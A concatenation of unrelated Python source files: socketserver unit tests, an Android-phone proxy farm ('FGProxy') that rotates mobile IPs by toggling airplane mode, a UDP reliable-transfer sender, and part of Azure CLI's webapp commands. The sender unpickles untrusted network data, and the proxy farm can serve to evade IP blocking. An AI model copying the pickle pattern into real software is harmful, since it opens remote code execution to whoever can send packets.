@reap_threads
def run_server(self, svrcls, hdlrbase, testfunc):
server = self.make_server(self.pickaddr(svrcls.address_family),
svrcls, hdlrbase)
# We had the OS pick a port, so pull the real address out of
# the server.
addr = server.server_address
if verbose:
print("ADDR =", addr)
print("CLASS =", svrcls)
t = threading.Thread(
name='%s serving' % svrcls,
target=server.serve_forever,
# Short poll interval to make the test finish quickly.
# Time between requests is short enough that we won't wake
# up spuriously too many times.
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
t.start()
if verbose: print("server running")
for i in range(3):
if verbose: print("test client", i)
testfunc(svrcls.address_family, addr)
if verbose: print("waiting for server")
server.shutdown()
t.join()
server.server_close()
self.assertEqual(-1, server.socket.fileno())
if HAVE_FORKING and isinstance(server, socketserver.ForkingMixIn):
# bpo-31151: Check that ForkingMixIn.server_close() waits until
# all children completed
self.assertFalse(server.active_children)
if verbose: print("done")
def stream_examine(self, proto, addr):
s = socket.socket(proto, socket.SOCK_STREAM)
s.connect(addr)
s.sendall(TEST_STR)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
s.close()
def dgram_examine(self, proto, addr):
s = socket.socket(proto, socket.SOCK_DGRAM)
if HAVE_UNIX_SOCKETS and proto == socket.AF_UNIX:
s.bind(self.pickaddr(proto))
s.sendto(TEST_STR, addr)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
s.close()
def test_TCPServer(self):
self.run_server(socketserver.TCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_ThreadingTCPServer(self):
self.run_server(socketserver.ThreadingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_forking
def test_ForkingTCPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_UnixStreamServer(self):
self.run_server(socketserver.UnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_ThreadingUnixStreamServer(self):
self.run_server(socketserver.ThreadingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixStreamServer(self):
with simple_subprocess(self):
self.run_server(ForkingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_UDPServer(self):
self.run_server(socketserver.UDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
def test_ThreadingUDPServer(self):
self.run_server(socketserver.ThreadingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_forking
def test_ForkingUDPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_UnixDatagramServer(self):
self.run_server(socketserver.UnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_ThreadingUnixDatagramServer(self):
self.run_server(socketserver.ThreadingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixDatagramServer(self):
self.run_server(ForkingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@reap_threads
def test_shutdown(self):
# Issue #2302: shutdown() should always succeed in making an
# other thread leave serve_forever().
class MyServer(socketserver.TCPServer):
pass
class MyHandler(socketserver.StreamRequestHandler):
pass
threads = []
for i in range(20):
s = MyServer((HOST, 0), MyHandler)
t = threading.Thread(
name='MyServer serving',
target=s.serve_forever,
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
threads.append((t, s))
for t, s in threads:
t.start()
s.shutdown()
for t, s in threads:
t.join()
s.server_close()
def test_tcpserver_bind_leak(self):
# Issue #22435: the server socket wouldn't be closed if bind()/listen()
# failed.
# Create many servers for which bind() will fail, to see if this result
# in FD exhaustion.
for i in range(1024):
with self.assertRaises(OverflowError):
socketserver.TCPServer((HOST, -1),
socketserver.StreamRequestHandler)
def test_context_manager(self):
with socketserver.TCPServer((HOST, 0),
socketserver.StreamRequestHandler) as server:
pass
self.assertEqual(-1, server.socket.fileno())
class ErrorHandlerTest(unittest.TestCase):
"""Test that the servers pass normal exceptions from the handler to
handle_error(), and that exiting exceptions like SystemExit and
KeyboardInterrupt are not passed."""
def tearDown(self):
test.support.unlink(test.support.TESTFN)
def test_sync_handled(self):
BaseErrorTestServer(ValueError)
self.check_result(handled=True)
def test_sync_not_handled(self):
with self.assertRaises(SystemExit):
BaseErrorTestServer(SystemExit)
self.check_result(handled=False)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threading_handled(self):
ThreadingErrorTestServer(ValueError)
self.check_result(handled=True)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threading_not_handled(self):
ThreadingErrorTestServer(SystemExit)
self.check_result(handled=False)
@requires_forking
def test_forking_handled(self):
ForkingErrorTestServer(ValueError)
self.check_result(handled=True)
@requires_forking
def test_forking_not_handled(self):
ForkingErrorTestServer(SystemExit)
self.check_result(handled=False)
def check_result(self, handled):
with open(test.support.TESTFN) as log:
expected = 'Handler called\n' + 'Error handled\n' * handled
self.assertEqual(log.read(), expected)
class BaseErrorTestServer(socketserver.TCPServer):
def __init__(self, exception):
self.exception = exception
super().__init__((HOST, 0), BadHandler)
with socket.create_connection(self.server_address):
pass
try:
self.handle_request()
finally:
self.server_close()
self.wait_done()
def handle_error(self, request, client_address):
with open(test.support.TESTFN, 'a') as log:
log.write('Error handled\n')
def wait_done(self):
pass
class BadHandler(socketserver.BaseRequestHandler):
def handle(self):
with open(test.support.TESTFN, 'a') as log:
log.write('Handler called\n')
raise self.server.exception('Test error')
class ThreadingErrorTestServer(socketserver.ThreadingMixIn,
BaseErrorTestServer):
def __init__(self, *pos, **kw):
self.done = threading.Event()
super().__init__(*pos, **kw)
def shutdown_request(self, *pos, **kw):
super().shutdown_request(*pos, **kw)
self.done.set()
def wait_done(self):
self.done.wait()
if HAVE_FORKING:
class ForkingErrorTestServer(socketserver.ForkingMixIn, BaseErrorTestServer):
pass
class SocketWriterTest(unittest.TestCase):
def test_basics(self):
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.wfile = self.wfile
self.server.wfile_fileno = self.wfile.fileno()
self.server.request_fileno = self.request.fileno()
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
s = socket.socket(
server.address_family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
with s:
s.connect(server.server_address)
server.handle_request()
self.assertIsInstance(server.wfile, io.BufferedIOBase)
self.assertEqual(server.wfile_fileno, server.request_fileno)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_write(self):
# Test that wfile.write() sends data immediately, and that it does
# not truncate sends when interrupted by a Unix signal
pthread_kill = test.support.get_attribute(signal, 'pthread_kill')
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.sent1 = self.wfile.write(b'write data\n')
# Should be sent immediately, without requiring flush()
self.server.received = self.rfile.readline()
big_chunk = b'\0' * test.support.SOCK_MAX_SIZE
self.server.sent2 = self.wfile.write(big_chunk)
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
response1 = None
received2 = None
main_thread = threading.get_ident()
def run_client():
s = socket.socket(server.address_family, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
with s, s.makefile('rb') as reader:
s.connect(server.server_address)
nonlocal response1
response1 = reader.readline()
s.sendall(b'client response\n')
reader.read(100)
# The main thread should now be blocking in a send() syscall.
# But in theory, it could get interrupted by other signals,
# and then retried. So keep sending the signal in a loop, in
# case an earlier signal happens to be delivered at an
# inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received2
received2 = len(reader.read())
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(server.sent1, len(response1))
self.assertEqual(response1, b'write data\n')
self.assertEqual(server.received, b'client response\n')
self.assertEqual(server.sent2, test.support.SOCK_MAX_SIZE)
self.assertEqual(received2, test.support.SOCK_MAX_SIZE - 100)
class MiscTestCase(unittest.TestCase):
def test_all(self):
# objects defined in the module should be in __all__
expected = []
for name in dir(socketserver):
if not name.startswith('_'):
mod_object = getattr(socketserver, name)
if getattr(mod_object, '__module__', None) == 'socketserver':
expected.append(name)
self.assertCountEqual(socketserver.__all__, expected)
def test_shutdown_request_called_if_verify_request_false(self):
# Issue #26309: BaseServer should call shutdown_request even if
# verify_request is False
class MyServer(socketserver.TCPServer):
def verify_request(self, request, client_address):
return False
shutdown_called = 0
def shutdown_request(self, request):
self.shutdown_called += 1
socketserver.TCPServer.shutdown_request(self, request)
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
s = socket.socket(server.address_family, socket.SOCK_STREAM)
s.connect(server.server_address)
s.close()
server.handle_request()
self.assertEqual(server.shutdown_called, 1)
server.server_close()
if __name__ == "__main__":
unittest.main()
|
api.py
|
# _*_ coding: utf-8 _*_
"""
Master Process
Why cluster running at ip6-localhost:8899?
/bin/bash$ adb shell cat /etc/hosts
127.0.0.1 localhost
::1 ip6-localhost
It can also run in ::1:8899.
下一步计划:检查 4g 网络是否可用
# 设备检测,如果设备不见了那么需要将设备踢出去
# devices_str = init_all_devices()
# log.info(f'Now running device count: {len(devices_str)}')
# if device.device_id not in devices_str:
# kill_master_port(device, port=master_port)
# return device
"""
import time
import logging
from adb import Device
from functools import partial
from command import CmdExecute
from multiprocessing import Queue
from multiprocessing import Process
from deploy.cli import deploy_to_remote
from __init__ import __author__, __version__, __site__
log = logging.getLogger(__name__)
def configure_logging(level):
logging.basicConfig(
level=level,
format='[%(asctime)s %(levelname)s] -> %(message)s',
)
_set_debug_logging = partial(configure_logging, logging.DEBUG)
_set_info_logging = partial(configure_logging, logging.INFO)
IP_SWITCHING_TIME = 30 * 60 # second
MASTER_PORT_START = 30000
HEALTH_CHECK_TIME = 1 * 60 # second
WAIT_AIRPLANE_MODE_TIME = 8 # second
def _init_msg(debug: bool) -> None:
if debug: # set debug level
_set_debug_logging()
else:
_set_info_logging()
print(f'\nauthor: [{__author__}] site: [{__site__}]')
print(f"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
' ███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██╗ ██╗ '
' ██╔════╝██╔════╝ ██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝╚██╗ ██╔╝ '
' █████╗ ██║ ███╗██████╔╝██████╔╝██║ ██║ ╚███╔╝ ╚████╔╝ '
' ██╔══╝ ██║ ██║██╔═══╝ ██╔══██╗██║ ██║ ██╔██╗ ╚██╔╝ '
' ██║ ╚██████╔╝██║ ██║ ██║╚██████╔╝██╔╝ ██╗ ██║ '
' ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ '
{__site__}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
""")
return None
def init_all_devices():
"""
List of devices attached
1daa96050207 device
1daa96050207 device
:return: [1daa96050207, 1daa96050207]
"""
devices_string = CmdExecute.execute_command('adb devices')
time.sleep(3)
devices_with_str = devices_string.split('\n')[1:-2]
online_devices = list()
for device_str in devices_with_str:
if 'device' in device_str:
online_devices.append(device_str)
devices = list(map(lambda x: x.split('\t')[0].strip(), online_devices))
log.info(f'Count: [{len(devices)}] Devices Found')
return devices
def _forward_tcp_port(device: Device, local_port, remote_port):
# nginx complex balanced local port
return device.adb.forward_tcp_port(local_port, remote_port)
def kill_master_port(device: Device, port: int):
return device.adb.kill_master_process(port)
def run_server(device, master_port):
"""
if int(device.adb.check_remote_port(ip, port).strip()) != 0:
The port is already in use
"""
# kill_master_port(device, master_port)
device.adb.remove_forward(master_port)
device.adb.kill_port_process(device.port)
# :If airplane mode is opened, first need close airplane mode
if device.airplane_mode_is_open:
device.adb.close_airplane_mode()
time.sleep(WAIT_AIRPLANE_MODE_TIME)
# :Running Proxy server command
device.adb.running_server(host=device.ip, port=device.port)
# : wait server running
time.sleep(2)
device.initialize_device()
# waite init device
time.sleep(1)
if not device.transfer_port_is_open:
return
_forward_tcp_port(device, master_port, device.port)
def _change_ip(master_port: int, cluster_device: Device, change_ip_queue):
"""
# :Close master port for nginx
# :Get device info
# :Check proxy running port
# :Time to change ip
# :Open master port for nginx
"""
time.sleep(IP_SWITCHING_TIME)
change_ip_queue.put_nowait(cluster_device.device_id)
cluster_device.adb.remove_forward(master_port)
cluster_device.adb.kill_port_process(cluster_device.port)
cluster_device.initialize_device()
if not cluster_device.airplane_mode_is_open:
cluster_device.adb.turn_on_airplane_mode()
cluster_device.adb.close_airplane_mode()
time.sleep(WAIT_AIRPLANE_MODE_TIME)
# if cluster_device.transfer_port_is_open is False:
cluster_device.adb.running_server(
host=cluster_device.ip,
port=cluster_device.port
)
time.sleep(1)
if cluster_device.adb.bridge_process().strip():
_forward_tcp_port(
device=cluster_device,
local_port=master_port,
remote_port=cluster_device.port
)
time.sleep(1)
if not cluster_device.adb.ping_test():
cluster_device.adb.remove_forward(port=master_port)
if not cluster_device.adb.check_local_port(master_port):
cluster_device.adb.remove_forward(port=master_port)
change_ip_queue.get_nowait()
def _health_check(master_port: int, device: Device, change_ip_queue):
# 如果正在切换 IP 那么此设备不会经过健康检测,否则会出现问题
time.sleep(HEALTH_CHECK_TIME)
if not change_ip_queue.empty():
if device.device_id == change_ip_queue.get_nowait():
change_ip_queue.put_nowait(device.device_id)
time.sleep(HEALTH_CHECK_TIME)
return None
change_ip_queue.put_nowait(device.device_id)
time.sleep(HEALTH_CHECK_TIME)
device.initialize_device()
if not device.transfer_port_is_open:
device.adb.remove_forward(port=master_port)
if device.airplane_mode_is_open:
device.adb.remove_forward(port=master_port)
if not device.adb.ping_test():
device.adb.remove_forward(port=master_port)
return None
class Daemon(object):
def __init__(self, devices: list):
self.devices = devices
self.change_ip_queue = Queue()
def worker(self, work_func, change_ip_queue):
while True:
for index, device in enumerate(self.devices):
master_port = MASTER_PORT_START + index
work_func(master_port, device, change_ip_queue)
def run_forever(self):
"""Running change ip and health check"""
process = [Process(target=self.worker, args=(_change_ip, self.change_ip_queue))]
[p.start() for p in process]
[p.join() for p in process]
def _deploy_all_device(devices: list) -> None:
for index, device in enumerate(devices):
log.info(f'Deploy device: {device.device_id} {len(devices)}/{index + 1}')
log.info(f'Device: {device.device_id} transfer port running is {device.transfer_port_is_open}')
log.info(f'Device: {device.device_id} transfer airplane mode open is {device.airplane_mode_is_open}')
# :Deploy and run server...
deploy_to_remote(device=device)
master_port = MASTER_PORT_START + index
run_server(device=device, master_port=master_port)
time.sleep(2)
daemon = Daemon(devices=devices)
daemon.run_forever()
def runner(debug: bool = True, ip: str = '0.0.0.0', port: int = 30000) -> None:
"""master entry
1. deploy the application to the phone.
2. get all device and init all device.
3. kill all proxy running port
4. running application and output log.
"""
_init_msg(debug=debug)
devices_str = init_all_devices()
if not devices_str:
log.warning('No connected mobile phone was found')
exit(1)
devices = [Device(device_id=device_id, port=port, ip=ip) for device_id in devices_str]
_deploy_all_device(devices)
log.info(f'FGProxy {__version__} remote running at {ip}:{port}')
if __name__ == '__main__':
runner(True, 'ip6-localhost', 10000)
|
rdtsend.py
|
import socket as st
import pickle
from packet import Packet
import time
import math
import threading
class RDTSend:
def __init__(self, addr):
self.sendAddr = addr
self.sendSocket = st.socket(st.AF_INET, st.SOCK_DGRAM)
self.timeout = 1
self.congWin = 1
self.threshold = 100
self.MSS = 512
self.seqNum = 0
self.ackNum = 0
self.sendAckNum = 0
self.windowSize = 1000
self.maxTimeout = 4
self.started = False
self.resendTimes = 0
def start(self):
self.started = True
self.seqNum = self.ackNum = self.sendAckNum = 0
print('Send to %s:%s' % self.sendAddr)
threading.Thread(target=self.count).start()
packet = Packet(b'', seqNum=self.seqNum,
ackNum=self.ackNum, Syn=True, Fin=False)
self.seqNum += 1
self.rdtSend({0: packet})
def end(self):
packet = Packet(b'', seqNum=self.seqNum,
ackNum=self.ackNum, Syn=False, Fin=True)
self.started = False
self.seqNum += len(pickle.dumps(packet.packet['data']))
self.rdtSend({packet.packet['seqNum']: packet})
def close(self):
self.started = False
if hasattr(self, 'sendSocket'):
self.sendSocket.close()
print('End of sender')
def sendPacket(self, packetList):
for packet in packetList:
self.sendSocket.sendto(packet.serialize(), self.sendAddr)
def rdtSend(self, packetDict):
startTime = time.time()
self.sendPacket([p for p in packetDict.values()])
self.waitForAck(packetDict, startTime)
# resend times <5
def sendData(self, dataList):
packetDict = {}
for i in range(len(dataList)):
data = dataList[i]
packet = Packet(data, seqNum=self.seqNum,
ackNum=self.ackNum, Syn=False, Fin=False)
self.seqNum += len(pickle.dumps(packet.packet['data']))
# print('pkt:\n'+str(packet))
packetDict[packet.packet['seqNum']] = packet
if (i+1) % self.congWin == 0:
self.rdtSend(packetDict)
packetDict = {}
if packetDict:
self.rdtSend(packetDict)
def waitForAck(self, packetDict, startTime):
# print('send '+str(self.seqNum))
ackFinish = False
resendTimes = 0
duplicateTimes = 0
timeout = False
while not ackFinish:
try:
self.sendSocket.settimeout(self.timeout)
ackNum = self.receiveAck()
# print('ack:\n '+str(ackNum))
if ackNum == self.seqNum:
self.sendAckNum = ackNum
ackFinish = True
elif ackNum > self.sendAckNum:
self.sendAckNum = ackNum
duplicateTimes = 0
resendTimes = 0
timeout = False
# fast retransmit
elif ackNum == self.sendAckNum:
duplicateTimes += 1
if duplicateTimes == 3:
raise Exception
except Exception as e:
self.resendTimes += 1
if isinstance(e, st.timeout):
timeout = True
# print(str(self.seqNum))
resendTimes += 1
# print('resend %d at %d times' % (self.sendAckNum, resendTimes))
# print('timeout '+str(self.timeout)+'sec')
if resendTimes >= 5:
if not self.started:
ackFinish = True
return True
else:
self.started = False
raise Exception('resend times >= 5')
self.sendPacket([packetDict[self.sendAckNum]])
self.updataCongWin(True, timeout)
self.updataTimeout(True)
endTime = time.time()
rtt = endTime-startTime
self.updataCongWin(resendTimes != 0, timeout)
self.updataTimeout(resendTimes != 0, rtt)
return True
def receiveAck(self):
rawData, addr = self.sendSocket.recvfrom(200+self.MSS)
packet = pickle.loads(rawData)
return packet['ackNum']
def updataTimeout(self, resend, rtt=1):
if resend == True:
if self.timeout < self.maxTimeout:
self.timeout *= 2
else:
self.timeout = 0.8*self.timeout+0.2*rtt+0.2*rtt
def updataCongWin(self, resend, timeout):
if resend == True:
self.threshold = math.ceil(0.5*self.congWin)
if timeout == True:
self.congWin = 1
else:
self.congWin = self.threshold
elif self.congWin < self.windowSize:
if self.congWin >= self.threshold:
self.congWin += 1
else:
self.congWin *= 2
def count(self):
while True:
last = self.seqNum
self.resendTimes = 0
time.sleep(0.5)
if self.started:
print('sending rate: %dKB/s' % ((self.seqNum-last)*2/(1024)))
print('resend ratio: %.3f%%' %
((self.resendTimes*self.MSS*100)/(self.seqNum-last+1)))
else:
break
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.storage.blob import BlockBlobService, BlobPermissions
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.commands.client_factory import UA_AGENT
from azure.cli.core.profiles import ResourceType
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, does_app_already_exist, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION, FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION,
FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS, NODE_VERSION_DEFAULT)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
